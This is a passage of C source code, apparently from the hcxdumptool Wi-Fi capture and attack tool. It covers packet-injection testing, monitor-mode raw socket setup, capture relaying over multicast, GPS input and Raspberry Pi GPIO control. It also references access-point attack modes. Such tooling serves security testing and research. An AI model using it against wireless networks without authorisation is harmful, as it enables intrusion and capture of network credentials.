globalclose(); } if((tv.tv_sec %gpiostatusledflashinterval) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; if(incomingcountold == incomingcount) { nanosleep(&sleepled, NULL); GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; } } incomingcountold = incomingcount; } if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); printrcascan(); } FD_ZERO(&readfds); FD_SET(fd_socket, &readfds); sd = fd_socket; if(fd_gps > 0) { FD_SET(fd_gps, &readfds); sd = fd_gps; } fdnum = pselect(sd +1, &readfds, NULL, NULL, &tsfd, NULL); if(fdnum < 0) { errorcount++; continue; } if(FD_ISSET(fd_gps, &readfds)) process_gps(); else if(FD_ISSET(fd_socket, &readfds)) process_packet_rca(); else { ptrfscanlist++; if(ptrfscanlist->frequency == 0) ptrfscanlist = fscanlist; if(set_channel() == false) { errorcount++; continue; } if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); } } globalclose(); return; } /*===========================================================================*/ static inline void process_fd_injection() { static int sd; static int fdnum; static fd_set readfds; static scanlist_t *zeiger; static struct timespec tsfd; static bool inject24 = false; static bool inject5 = false; static bool inject6 = false; static int networkcount = 0; static int networkhit = 0; static int networkratio = 0; static int stagecount = 1; gettimeofday(&tv, NULL); tvold.tv_sec = tv.tv_sec; tvold.tv_usec = tv.tv_usec; tsfd.tv_sec = 0; tsfd.tv_nsec = FDNSECTIMER; if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); attackstatus = 0; fprintf(stdout, "starting antenna test and packet injection test (that can take up to two minutes)...\n"); ptrfscanlist = fscanlist; if(set_channel() == false) errorcount++; while(tvold.tv_sec == tv.tv_sec) gettimeofday(&tv, NULL); tvold.tv_sec = tv.tv_sec; fprintf(stdout, "\e[?25lstage %d of 2 probing frequency %d/%d proberesponse %d", stagecount, ptrfscanlist->frequency, ptrfscanlist->channel, responsehit); while(wantstopflag == false) { if(errorcount >= maxerrorcount) { fprintf(stderr, "\nmaximum number of errors is reached\n"); if(forceinterfaceflag == false) globalclose(); } if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) globalclose(); } gettimeofday(&tv, NULL); if(tv.tv_sec != tvold.tv_sec) { get_channel(); tvold.tv_sec = tv.tv_sec; if((tv.tv_sec %gpiostatusledflashinterval) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; if((tv.tv_sec -tvlast_sec) > WATCHDOG) { nanosleep(&sleepled, NULL); GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; } } } if((tv.tv_sec %2) == 0) { ptrfscanlist++; if(ptrfscanlist->frequency == 0) { ptrfscanlist = fscanlist; stagecount++; } if(stagecount >= 3) break; if(set_channel() == false) continue; fprintf(stdout, "\rstage %d of 2 probing frequency %d/%d proberesponse %d ", stagecount, ptrfscanlist->frequency, ptrfscanlist->channel, responsehit); } if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); } FD_ZERO(&readfds); FD_SET(fd_socket, &readfds); sd = fd_socket; if(fd_gps > 0) { FD_SET(fd_gps, &readfds); sd = fd_gps; } fdnum = pselect(sd +1, &readfds, NULL, NULL, &tsfd, NULL); if(fdnum < 0) { errorcount++; continue; } if(FD_ISSET(fd_gps, &readfds)) process_gps(); else if(FD_ISSET(fd_socket, &readfds)) process_packet_rca(); } qsort(scanlist, scanlistmax, SCANLIST_SIZE, sort_scanlist_by_hit); fprintf(stdout, "\e[?25h\n"); for(zeiger = scanlist; zeiger < scanlist +SCANLIST_MAX; zeiger++) { if(zeiger->count == 0) break; if(zeiger->hit > 0) { if(zeiger->channel < 36) inject24 = true; else if((zeiger->channel >= 36) && (zeiger->channel < 200)) inject5 = true; else if(zeiger->channel >= 200) inject6 = true; injectionhit += zeiger->hit; networkhit++; } injectioncount += zeiger->beacon; networkcount++; } if(injectionhit > 0) { if((injectionhit > 0) && (injectioncount > 0)) injectionratio = (injectionhit *100) /injectioncount; if(injectionratio > 100) injectionratio = 100; if(inject24 == true) fprintf(stdout, "packet injection is working on 2.4GHz!\n"); if(inject5 == true) fprintf(stdout, "packet injection is working on 5GHz!\n"); if(inject6 == true) fprintf(stdout, "packet injection is working on 6GHz!\n"); fprintf(stdout, "injection ratio: %d%% (BEACON: %d PROBERESPONSE: %d)\n", injectionratio, injectioncount, injectionhit); if(injectionratio < 25) fprintf(stdout, "your injection ratio is poor - improve your equipment and/or get closer to the target\n"); else if((injectionratio >= 25) && (injectionratio < 50)) fprintf(stdout, "your injection ratio is average, but there is still room for improvement\n"); else if((injectionratio >= 50) && (injectionratio < 75)) fprintf(stdout, "your injection ratio is good\n"); else if((injectionratio >= 75) && (injectionratio < 90)) fprintf(stdout, "your injection ratio is excellent, let's ride!\n"); else if(injectionratio > 90) fprintf(stdout, "your injection ratio is huge - say kids what time is it?\n"); if((networkhit > 0) && (networkcount > 0)) networkratio = (networkhit *100) /networkcount; if(networkratio > 100) networkratio = 100; fprintf(stdout, "antenna ratio: %d%% (NETWORK: %d PROBERESPONSE: %d)\n", networkratio, networkcount, networkhit); if(networkratio < 25) fprintf(stdout, "your incection ratio is poor - improve your antenna and get closer to the target\n"); else if((networkratio >= 25) && (networkratio < 50)) fprintf(stdout, "your antenna ratio is average, but there is still room for improvement\n"); else if((networkratio >= 50) && (networkratio < 75)) fprintf(stdout, "your antenna ratio is good\n"); else if((networkratio >= 75) && (networkratio < 90)) fprintf(stdout, "your antenna ratio is excellent, let's ride!\n"); else if(networkratio > 90) fprintf(stdout, "your antenna ratio is huge - say kids what time is it?\n"); } else fprintf(stdout, "warning: no PROBERESPONSE received - packet injection is probably not working!\n"); errorcount -= radiotaperrorcount; errorcount -= gpserrorcount; if(errorcount == 1) fprintf(stdout, "%d driver error encountered during the test\n", errorcount); if(errorcount > 1) fprintf(stdout, "%d driver errors encountered during the test\n", errorcount); if(radiotaperrorcount == 1) fprintf(stdout, "%d radiotap error encountered during the test\n", radiotaperrorcount); if(radiotaperrorcount > 1) fprintf(stdout, "%d radiotap errors encountered during the test\n", radiotaperrorcount); if(gpserrorcount == 1) fprintf(stdout, "%d GPS error encountered during the test\n", gpserrorcount); if(gpserrorcount > 1) fprintf(stdout, "%d GPS errors encountered during the test\n", gpserrorcount); globalclose(); return; } /*===========================================================================*/ static inline void process_server() { static fd_set readfds; static struct timespec tsfd; static struct stat statinfo; static int fdnum; static int msglen; static uint32_t statuscount; static char serverstatus[SERVERMSG_MAX]; static bool havepcapngheader; static int c = 0; static char newpcapngoutname[PATH_MAX +2]; static uint8_t pcapngheader[SERVERMSG_MAX]; static uint8_t temppacket[SERVERMSG_MAX]; static int temppacket_len = 0; static struct sockaddr_in sockaddrFrom; static socklen_t sockaddrFrom_len = sizeof(sockaddrFrom); static int written; fprintf(stdout, "waiting for hcxdumptool server...\n"); gettimeofday(&tv, NULL); timestampstart = ((uint64_t)tv.tv_sec *1000000) +tv.tv_usec; timestamp = timestampstart; wantstopflag = false; statuscount = 1; tsfd.tv_sec = 1; tsfd.tv_nsec = 0; havepcapngheader = false; if(pcapngoutname != NULL) { clientrequestpcapnghead((struct sockaddr*)&mcsrvaddress, sizeof(mcsrvaddress)); } while(1) { if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) { globalclose(); } } if(wantstopflag == true) { globalclose(); } FD_ZERO(&readfds); FD_SET(fd_socket_mccli, &readfds); fdnum = pselect(fd_socket_mccli +1, &readfds, NULL, NULL, &tsfd, NULL); if(fdnum < 0) { errorcount++; continue; } if(FD_ISSET(fd_socket_mccli, &readfds)) { msglen = recvfrom(fd_socket_mccli, serverstatus, SERVERMSG_MAX, 0, (struct sockaddr*)&sockaddrFrom, &sockaddrFrom_len); if(msglen < 1) { perror("\nfailed to read data from server"); continue; } switch(serverstatus[0]) { case SERVERMSG_TYPE_STATUS: serverstatus[msglen] = 0; fprintf(stdout, "%s", &serverstatus[SERVERMSG_HEAD_SIZE]); if((pcapngoutname != NULL) && (havepcapngheader == false) && (pcapngoutname != NULL)) { clientrequestpcapnghead((struct sockaddr*)&sockaddrFrom, sockaddrFrom_len); } break; case SERVERMSG_TYPE_PCAPNGHEAD: if(pcapngoutname == NULL) break; if((havepcapngheader == true) && (fd_pcapng > 0)) { if(strcmp(pcapngoutname, "-") == 0) break; if((memcmp(&pcapngheader, &serverstatus[SERVERMSG_HEAD_SIZE], (msglen -SERVERMSG_HEAD_SIZE)) != 0)) close(fd_pcapng); else break; } if(strcmp(pcapngoutname, "-") != 0) { strncpy(newpcapngoutname, pcapngoutname, PATH_MAX); while(stat(newpcapngoutname, &statinfo) == 0) { snprintf(newpcapngoutname, PATH_MAX, "%s-%d", pcapngoutname, c); c++; } umask(0); fd_pcapng = open(newpcapngoutname, O_WRONLY | O_CREAT, 0644); if(fd_pcapng <= 0) { fprintf(stderr, "could not create dumpfile %s\n", newpcapngoutname); errorcount++; globalclose(); } } written = write(fd_pcapng, &serverstatus[SERVERMSG_HEAD_SIZE], (msglen -SERVERMSG_HEAD_SIZE)); if(written != (msglen -SERVERMSG_HEAD_SIZE)) { fprintf(stderr, "could not write to dumpfile %s\n", newpcapngoutname); errorcount++; globalclose(); } havepcapngheader = true; memcpy(&pcapngheader, &serverstatus[SERVERMSG_HEAD_SIZE], (msglen -SERVERMSG_HEAD_SIZE)); if(temppacket_len > 0) { written = write(fd_pcapng, &temppacket, temppacket_len); if(written != temppacket_len) { fprintf(stderr, "could not write temppacket to dumpfile %s\n", newpcapngoutname); errorcount++; globalclose(); } temppacket_len = 0; } break; case SERVERMSG_TYPE_PCAPNG: if(pcapngoutname == NULL) break; if((havepcapngheader == true) && (fd_pcapng > 0)) { written = write(fd_pcapng, &serverstatus[SERVERMSG_HEAD_SIZE], (msglen -SERVERMSG_HEAD_SIZE)); if(written != (msglen -SERVERMSG_HEAD_SIZE)) { fprintf(stderr, "could not write to dumpfile %s\n", newpcapngoutname); errorcount++; globalclose(); } } else { clientrequestpcapnghead((struct sockaddr*)&sockaddrFrom, sockaddrFrom_len); memcpy(&temppacket, &serverstatus[SERVERMSG_HEAD_SIZE], (msglen -SERVERMSG_HEAD_SIZE)); temppacket_len = (msglen -SERVERMSG_HEAD_SIZE); } break; } } else { if((statuscount %5) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; } } statuscount++; } } return; } /*===========================================================================*/ /*===========================================================================*/ static inline bool checkmonitorinterface(char *checkinterfacename) { static const char *vifstr1 = "mon"; static const char *vifstr2 = "prism"; if(checkinterfacename == NULL) return true; if(strstr(checkinterfacename, vifstr1) == NULL) return false; if(strstr(checkinterfacename, vifstr2) == NULL) return false; return true; } /*===========================================================================*/ static inline void checkunwanted(const char *unwantedname) { static FILE *fp; static char pidline[1024]; static char *pidptr = NULL; memset(&pidline, 0, 1024); fp = popen(unwantedname,"r"); if(fp) { pidptr = fgets(pidline, 1024, fp); if(pidptr != NULL) fprintf(stderr, "warning possible interfere: %s is running with pid %s\n", &unwantedname[6], pidline); pclose(fp); } return; } /*===========================================================================*/ static inline void checkallunwanted() { static const char *networkmanager = "pidof NetworkManager"; static const char *wpasupplicant = "pidof wpa_supplicant"; static const char *airodumpng = "pidof lt-airodump-ng"; static const char *kismet = "pidof kismet"; checkunwanted(networkmanager); checkunwanted(wpasupplicant); checkunwanted(airodumpng); checkunwanted(kismet); return; } /*===========================================================================*/ static inline bool openmcclisocket(int mccliport) { static int loop; static struct sockaddr_in mccliaddress; fd_socket_mccli = 0; if((fd_socket_mccli = socket(PF_INET, SOCK_DGRAM, 0)) < 0) { perror ("client socket failed"); return false; } memset (&mcsrvaddress, 0, sizeof(mcsrvaddress)); mcsrvaddress.sin_family = AF_INET; mcsrvaddress.sin_addr.s_addr = inet_addr(mcip); mcsrvaddress.sin_port = htons(mccliport); memset (&mccliaddress, 0, sizeof(mccliaddress)); mccliaddress.sin_family = AF_INET; mccliaddress.sin_addr.s_addr = inet_addr(mcip); mccliaddress.sin_port = htons(mccliport); loop = 1; if(setsockopt(fd_socket_mccli, SOL_SOCKET, SO_REUSEADDR, &loop, sizeof (loop)) < 0) { perror("setsockopt() SO_REUSEADDR failed"); return false; } loop = 1; if(setsockopt(fd_socket_mccli, SOL_SOCKET, SO_REUSEPORT, &loop, sizeof (loop)) < 0) { perror("setsockopt() SO_REUSEPORT failed"); return false; } if(bind(fd_socket_mccli, (struct sockaddr*)&mccliaddress, sizeof(mccliaddress)) < 0) { perror ("bind client failed"); return false; } loop = 1; if(ismulticastip(mcip) == true) { if (setsockopt(fd_socket_mccli, IPPROTO_IP, IP_MULTICAST_LOOP, &loop, sizeof (loop)) < 0) { perror ("setsockopt() IP_MULTICAST_LOOP failed"); return false; } memset(&mcmreq, 0, sizeof(mcmreq)); mcmreq.imr_multiaddr.s_addr = inet_addr(mcip); mcmreq.imr_interface.s_addr = htonl(INADDR_ANY); if(setsockopt(fd_socket_mccli, IPPROTO_IP, IP_ADD_MEMBERSHIP, &mcmreq, sizeof(mcmreq)) < 0) { perror ("setsockopt() IP_ADD_MEMBERSHIP failed"); return false; } } return true; } /*===========================================================================*/ static inline bool openmcsrvsocket(int mcsrvport) { static int loop; fd_socket_mcsrv = 0; if((fd_socket_mcsrv = socket (AF_INET, SOCK_DGRAM, 0)) < 0) { perror("server socket failed"); return false; } memset (&mcsrvaddress, 0, sizeof(mcsrvaddress)); mcsrvaddress.sin_family = AF_INET; mcsrvaddress.sin_addr.s_addr = inet_addr(mcip); mcsrvaddress.sin_port = htons(mcsrvport); loop = 1; if(setsockopt(fd_socket_mcsrv, SOL_SOCKET, SO_REUSEADDR, &loop, sizeof (loop)) < 0) { perror("setsockopt() SO_REUSEADDR failed"); return false; } loop = 1; if(setsockopt(fd_socket_mcsrv, SOL_SOCKET, SO_REUSEPORT, &loop, sizeof (loop)) < 0) { perror("setsockopt() SO_REUSEPORT failed"); return false; } if(ismulticastip(mcip) == true) { if((fd_socket_srv = socket (AF_INET, SOCK_DGRAM, 0)) < 0) { perror("server socket failed"); return false; } memset(&srvaddress, 0, sizeof(srvaddress)); srvaddress.sin_family = AF_INET; srvaddress.sin_addr.s_addr = inet_addr(mcip); srvaddress.sin_port = htons(mcsrvport); loop = 1; if(setsockopt(fd_socket_srv, SOL_SOCKET, SO_REUSEADDR, &loop, sizeof (loop)) < 0) { perror("setsockopt() SO_REUSEADDR failed"); return false; } loop = 1; if(setsockopt(fd_socket_srv, SOL_SOCKET, SO_REUSEPORT, &loop, sizeof (loop)) < 0) { perror("setsockopt() SO_REUSEPORT failed"); return false; } if(bind(fd_socket_srv, (struct sockaddr*)&srvaddress, sizeof(srvaddress)) < 0) { perror("server mc socket bind failed"); close(fd_socket_srv); return false; } loop = 1; if (setsockopt(fd_socket_srv, IPPROTO_IP, IP_MULTICAST_LOOP, &loop, sizeof (loop)) < 0) { perror ("setsockopt() IP_MULTICAST_LOOP failed"); return false; } memset(&mcmreq, 0, sizeof(mcmreq)); mcmreq.imr_multiaddr.s_addr = inet_addr(mcip); mcmreq.imr_interface.s_addr = htonl(INADDR_ANY); if(setsockopt(fd_socket_srv, IPPROTO_IP, IP_ADD_MEMBERSHIP, &mcmreq, sizeof(mcmreq)) < 0) { perror ("setsockopt() IP_ADD_MEMBERSHIP failed"); return false; } } else { fd_socket_srv = fd_socket_mcsrv; } if(sendto(fd_socket_mcsrv, "\x01hello hcxdumptool client...\n", sizeof ("\x01hello hcxdumptool client...\n"), 0, (struct sockaddr*)&mcsrvaddress, sizeof(mcsrvaddress)) < 0) { perror("server socket failed"); close(fd_socket_mcsrv); return false; } if((pcapngoutname != NULL) && (strcmp(pcapngoutname, "+") == 0)) { fd_pcapng = fd_socket_mcsrv; sendpcapngheader(); } return true; } /*===========================================================================*/ static inline void opengps() { static int havegps; static struct sockaddr_in gpsd_addr; static int fdnum; static fd_set readfds; static struct timespec tsfd; static const char *nogps = "N/A"; static const char gpgga[] = "$GPGGA"; static const char gprmc[] = "$GPRMC"; static const char *gpsd_enable_nmea = "?WATCH={\"enable\":true,\"json\":false,\"nmea\":true}"; nmealen = 0; memset(&nmeasentence, 0, NMEA_MAX); memcpy(&nmeasentence, nogps, 3); if(gpsname != NULL) { fprintf(stdout, "connecting GPS device...\n"); if((fd_gps = open(gpsname, O_RDONLY)) < 0) { perror( "failed to open GPS device"); fprintf(stderr, "failed to open GPS device\n"); fd_gps = 0; return; } } if(gpsdflag == true) { if((fd_gps = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror( "failed to open GPSD socket"); fd_gps = 0; return; } fprintf(stdout, "connecting GPSD...\n"); memset(&gpsd_addr, 0, sizeof(struct sockaddr_in)); gpsd_addr.sin_family = AF_INET; gpsd_addr.sin_port = htons(2947); gpsd_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); if(connect(fd_gps, (struct sockaddr*) &gpsd_addr, sizeof(gpsd_addr)) < 0) { perror("failed to connect to GPSD"); fd_gps = 0; return; } if(write(fd_gps, gpsd_enable_nmea, 47) != 47) { perror("failed to activate GPSD WATCH"); fd_gps = 0; return; } } tsfd.tv_sec = 1; tsfd.tv_nsec = 0; havegps = 0; while(1) { if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) globalclose(); } if(wantstopflag == true) globalclose(); FD_ZERO(&readfds); FD_SET(fd_gps, &readfds); fdnum = pselect(fd_gps +1, &readfds, NULL, NULL, &tsfd, NULL); if(fdnum < 0) { gpserrorcount++; errorcount++; continue; } if(FD_ISSET(fd_gps, &readfds)) { process_gps(); if(memcmp(&gpgga, nmeasentence, 6) == 0) return; if(memcmp(&gprmc, nmeasentence, 6) == 0) return; if(havegps > 120) return; havegps++; } else { if(havegps > 120) return; havegps++; } } return; } /*===========================================================================*/ static inline bool opensocket() { static struct ethtool_perm_addr *epmaddr; static struct ifreq ifr; static struct iwreq iwr; static struct iw_param param; static struct sockaddr_ll ll; static struct packet_mreq mr; static struct ethtool_drvinfo drvinfo; static struct iw_param txpower; static double lfin; fd_socket = 0; memset(&mac_orig, 0, 6); memset(&mac_virt, 0, 6); memset(&drivername, 0, 34); memset(&driverversion, 0, 34); memset(&driverfwversion, 0, 34); checkallunwanted(); if(forceinterfaceflag == true)fprintf(stderr, "warning: ioctl() warnings are ignored - if monitor mode, packet injection or channel switch is not working as expected\n"); if(checkmonitorinterface(interfacename) == true) fprintf(stderr, "warning: %s is probably a virtual monitor interface and some attack modes may not work as expected\n", interfacename); if((fd_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("socket failed"); return false; } memset(interfaceprotocol, 0, IFNAMSIZ); memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIWNAME, &iwr) < 0) { perror("failed to detect wlan interface"); if(forceinterfaceflag == false) return false; } strncpy(interfaceprotocol, iwr.u.name, IFNAMSIZ); if(bpf.len > 0) { if(setsockopt(fd_socket, SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf)) < 0) perror("failed to set Berkeley Packet Filter"); } memset(&ifr_old, 0, sizeof(ifr)); strncpy(ifr_old.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr_old) < 0) { perror("failed to backup current interface flags, ioctl(SIOCGIFFLAGS) not supported by driver"); if(forceinterfaceflag == false) return false; } memset(&iwr_old, 0, sizeof(iwr)); strncpy(iwr_old.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIWMODE, &iwr_old) < 0) { perror("failed to backup current interface mode, ioctl(SIOCGIWMODE) not supported by driver"); if(forceinterfaceflag == false) return false; } if((iwr_old.u.mode & IW_MODE_MONITOR) != IW_MODE_MONITOR) { memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr) < 0) { perror("failed to get current interface flags, ioctl(SIOCGIFFLAGS) not supported by driver"); if(forceinterfaceflag == false) return false; } ifr.ifr_flags = 0; if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0) { perror("failed to set interface down, ioctl(SIOCSIFFLAGS) not supported by driver"); if(forceinterfaceflag == false) return false; } memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIWMODE, &iwr) < 0) { perror("failed to get interface information, ioctl(SIOCGIWMODE) not supported by driver"); if(forceinterfaceflag == false) return false; } iwr.u.mode = IW_MODE_MONITOR; if(ioctl(fd_socket, SIOCSIWMODE, &iwr) < 0) { perror("failed to set monitor mode, ioctl(SIOCSIWMODE) not supported by driver"); if(forceinterfaceflag == false) return false; } memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIWMODE, &iwr) < 0) { perror("failed to get interface information, ioctl(SIOCGIWMODE) not supported by driver"); if(forceinterfaceflag == false) return false; } if((iwr.u.mode & IW_MODE_MONITOR) != IW_MODE_MONITOR) { fprintf(stderr, "warning: physical interface is not in monitor mode\n"); if(forceinterfaceflag == false) return false; } ifr.ifr_flags = IFF_UP | IFF_BROADCAST | IFF_RUNNING; if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0) { perror("failed to set interface up, ioctl(SIOCSIFFLAGS) not supported by driver"); if(forceinterfaceflag == false) return false; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr) < 0) { perror("failed to get interface flags, ioctl(SIOCGIFFLAGS) not supported by driver"); if(forceinterfaceflag == false) return false; } if((ifr.ifr_flags & (IFF_UP)) != (IFF_UP)) { fprintf(stderr, "warning: interface is not up\n"); if(forceinterfaceflag == false) return false; } } else { fprintf(stderr, "interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls\n"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr) < 0) perror("failed to get interface flags, ioctl(SIOCGIFFLAGS) not supported by driver"); if((ifr.ifr_flags & (IFF_UP)) != (IFF_UP)) fprintf(stderr, "warning: interface is not up\n"); } /* disable power management, if possible */ memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, interfacename, IFNAMSIZ -1); iwr.u.power.disabled = 1; ioctl(fd_socket, SIOCSIWPOWER, &iwr); memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, interfacename, IFNAMSIZ -1); ioctl(fd_socket, SIOCGIWTXPOW, &iwr); memcpy(&txpower, &(iwr.u.txpower), sizeof(param)); interfacetxpwr = 0; lfin = (double)txpower.value; if(txpower.flags & IW_TXPOW_RELATIVE) interfacetxpwr = txpower.value; else { if(txpower.flags & IW_TXPOW_MWATT) { while(lfin > 10.0) { interfacetxpwr += 10; lfin /= 10.0; } while(lfin > 1.000001) /* Eliminate rounding errors, take ceil */ { interfacetxpwr += 1; lfin /= 1.25892541179; } } else { interfacetxpwr = txpower.value; } } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); ifr.ifr_flags = 0; if(ioctl(fd_socket, SIOCGIFINDEX, &ifr) < 0) { perror("failed to get SIOCGIFINDEX, ioctl(SIOCGIFINDEX) not supported by driver"); return false; } memset(&ll, 0, sizeof(ll)); ll.sll_family = PF_PACKET; ll.sll_ifindex = ifr.ifr_ifindex; ll.sll_protocol = htons(ETH_P_ALL); ll.sll_halen = ETH_ALEN; ll.sll_pkttype = PACKET_OTHERHOST | PACKET_OUTGOING; if(bind(fd_socket, (struct sockaddr*) &ll, sizeof(ll)) < 0) { perror("failed to bind socket"); return false; } memset(&mr, 0, sizeof(mr)); mr.mr_ifindex = ifr.ifr_ifindex; mr.mr_type = PACKET_MR_PROMISC; if(setsockopt(fd_socket, SOL_PACKET, PACKET_ADD_MEMBERSHIP, &mr, sizeof(mr)) < 0) { perror("failed to set setsockopt(PACKET_MR_PROMISC)"); return false; } epmaddr = (struct ethtool_perm_addr*)calloc(1, sizeof(struct ethtool_perm_addr) +6); if(!epmaddr) { perror("failed to malloc memory for permanent hardware address"); return false; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); epmaddr->cmd = ETHTOOL_GPERMADDR; epmaddr->size = 6; ifr.ifr_data = (char*)epmaddr; if(ioctl(fd_socket, SIOCETHTOOL, &ifr) < 0) { perror("failed to get permanent hardware address, ioctl(SIOCETHTOOL) not supported by driver"); return false; } if(epmaddr->size != 6) { fprintf(stderr, "failed to get permanent hardware address length\n"); return false; } memcpy(&mac_orig, epmaddr->data, 6); free(epmaddr); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFHWADDR, &ifr) == 0) memcpy(&mac_virt, ifr.ifr_hwaddr.sa_data, 6); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); ifr.ifr_data = (char*)&drvinfo; drvinfo.cmd = ETHTOOL_GDRVINFO; if(ioctl(fd_socket, SIOCETHTOOL, &ifr) < 0) { perror("failed to get driver information, ioctl(SIOCETHTOOL) not supported by driver"); return false; } memcpy(&drivername, drvinfo.driver, 32); memcpy(&driverversion, drvinfo.version, 32); memcpy(&driverfwversion, drvinfo.fw_version, ETHTOOL_FWVERS_LEN); return true; } /*===========================================================================*/ static inline bool initgpio(int gpioperi) { static int fd_mem; fd_mem = open("/dev/mem", O_RDWR|O_SYNC); if(fd_mem < 0) { fprintf(stderr, "failed to get device memory\n"); return false; } gpio_map = mmap(NULL, BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_mem, GPIO_BASE +gpioperi); close(fd_mem); if(gpio_map == MAP_FAILED) { fprintf(stderr, "failed to map GPIO memory\n"); return false; } gpio = (volatile unsigned *)gpio_map; return true; } /*===========================================================================*/ static inline int getrpirev() { static FILE *fh_rpi; static int len; static int rpi = 0; static int rev = 0; static int gpioperibase = 0; static char *revptr = NULL; static const char *revstr = "Revision"; static const char *hwstr = "Hardware"; static const char *snstr = "Serial"; static char linein[128]; fh_rpi = fopen("/proc/cpuinfo", "r"); if(fh_rpi == NULL) { perror("failed to retrieve cpuinfo"); return gpioperibase; } while(1) { if((len = fgetline(fh_rpi, 128, linein)) == -1) break; if(len < 15) continue; if(memcmp(&linein, hwstr, 8) == 0) { rpi |= 1; continue; } if(memcmp(&linein, revstr, 8) == 0) { rpirevision = strtol(&linein[len -6], &revptr, 16); if((revptr -linein) == len) { rev = (rpirevision >> 4) &0xff; if(rev <= 3) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0x09) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0x0c) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if((rev == 0x04) || (rev == 0x08) || (rev == 0x0d) || (rev == 0x0e) || (rev == 0x11) || (rev == 0x13)) { gpioperibase = GPIO_PERI_BASE_NEW; rpi |= 2; continue; } continue; } rpirevision = strtol(&linein[len -4], &revptr, 16); if((revptr -linein) == len) { if((rpirevision < 0x02) || (rpirevision > 0x15)) continue; if((rpirevision == 0x11) || (rpirevision == 0x14)) continue; gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; } continue; } if(memcmp(&linein, snstr, 6) == 0) { rpi |= 4; continue; } } fclose(fh_rpi); if(rpi < 0x7) return 0; return gpioperibase; } /*===========================================================================*/ static inline void getscanlistchannel(const char *scanlistin) { static struct iwreq pwrq; static char *fscanlistdup; static char *tokptr; fscanlistdup = strndup(scanlistin, 4096); if(fscanlistdup == NULL) return; tokptr = strtok(fscanlistdup, ","); ptrfscanlist = fscanlist; while((tokptr != NULL) && (ptrfscanlist < fscanlist +FSCANLIST_MAX)) { memset(&pwrq, 0, sizeof(pwrq)); memcpy(&pwrq.ifr_name, interfacename, IFNAMSIZ); pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = atoi(tokptr); tokptr = strtok(NULL, ","); if(pwrq.u.freq.m > 1000) pwrq.u.freq.e = 6; if(ioctl(fd_socket, SIOCSIWFREQ, &pwrq) < 0) continue; if(ioctl(fd_socket, SIOCGIWFREQ, &pwrq) < 0) continue; ptrfscanlist->frequency = pwrq.u.freq.m; if((pwrq.u.freq.m >= 2407) && (pwrq.u.freq.m <= 2474)) ptrfscanlist->channel = (ptrfscanlist->frequency -2407)/5; else if((pwrq.u.freq.m >= 2481) && (pwrq.u.freq.m <= 2487)) ptrfscanlist->channel = (pwrq.u.freq.m -2412)/5; else if((pwrq.u.freq.m >= 5005) && (pwrq.u.freq.m <= 5980)) ptrfscanlist->channel = (pwrq.u.freq.m -5000)/5; else if((pwrq.u.freq.m >= 5955) && (pwrq.u.freq.m <= 6415)) ptrfscanlist->channel = (pwrq.u.freq.m -5950)/5; else continue; if(((ptrfscanlist->channel) 